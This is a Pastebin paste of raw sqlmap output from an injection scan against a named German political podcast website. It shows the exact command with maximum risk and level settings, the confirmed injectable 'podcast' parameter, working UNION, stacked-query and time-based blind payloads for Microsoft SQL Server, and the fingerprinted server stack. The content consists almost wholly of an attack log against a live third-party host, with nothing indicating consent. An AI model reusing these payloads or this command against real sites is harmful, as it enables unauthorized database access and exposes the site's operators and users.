API tools faq
paste
Advertisement
Darksider3

kraehennest

Darksider3
Aug 20th, 2014
204
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.11 KB | None | 0 0
raw download clone embed print report
  1. /sqlmap.py --risk=3 --level=5 -u http://kraehennest.piraten-wagen-mehr-demokratie.de/Startform.aspx?podcast=Kr%u00e4hennestSitzungen
  2. _
  3. ___ ___| |_____ ___ ___ {1.0-dev-6795b51}
  4. |_ -| . | | | .'| . |
  5. |___|_ |_|_|_|_|__,| _|
  6. |_| |_| http://sqlmap.org
  7.  
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9.  
  10. [*] starting at 10:43:49
  11.  
  12. [10:43:50] [INFO] resuming back-end DBMS 'microsoft sql server'
  13. [10:43:50] [INFO] testing connection to the target URL
  14. [10:43:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
  15. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  16. ---
  17. Place: GET
  18. Parameter: podcast
  19. Type: UNION query
  20. Title: Generic UNION query (NULL) - 2 columns
  21. Payload: podcast=Kr%u00e4hennestSitzungen' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(118)+CHAR(102)+CHAR(113)+CHAR(71)+CHAR(119)+CHAR(102)+CHAR(104)+CHAR(103)+CHAR(77)+CHAR(75)+CHAR(112)+CHAR(78)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(97)+CHAR(113)--
  22.  
  23. Type: stacked queries
  24. Title: Microsoft SQL Server/Sybase stacked queries
  25. Payload: podcast=Kr%u00e4hennestSitzungen'; WAITFOR DELAY '0:0:5'--
  26.  
  27. Type: AND/OR time-based blind
  28. Title: Microsoft SQL Server/Sybase time-based blind
  29. Payload: podcast=Kr%u00e4hennestSitzungen' WAITFOR DELAY '0:0:5'--
  30. ---
  31. [10:43:51] [INFO] the back-end DBMS is Microsoft SQL Server
  32. web server operating system: Windows 2003 or XP
  33. web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
  34. back-end DBMS: Microsoft SQL Server 2008
  35. [10:43:51] [WARNING] HTTP error codes detected during run:
  36. 500 (Internal Server Error) - 1 times
  37. [10:43:51] [INFO] fetched data logged to text files under '/home/darksider3/.sqlmap/output/kraehennest.piraten-wagen-mehr-demokratie.de'
  38.  
  39. [*] shutting down at 10:43:51
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!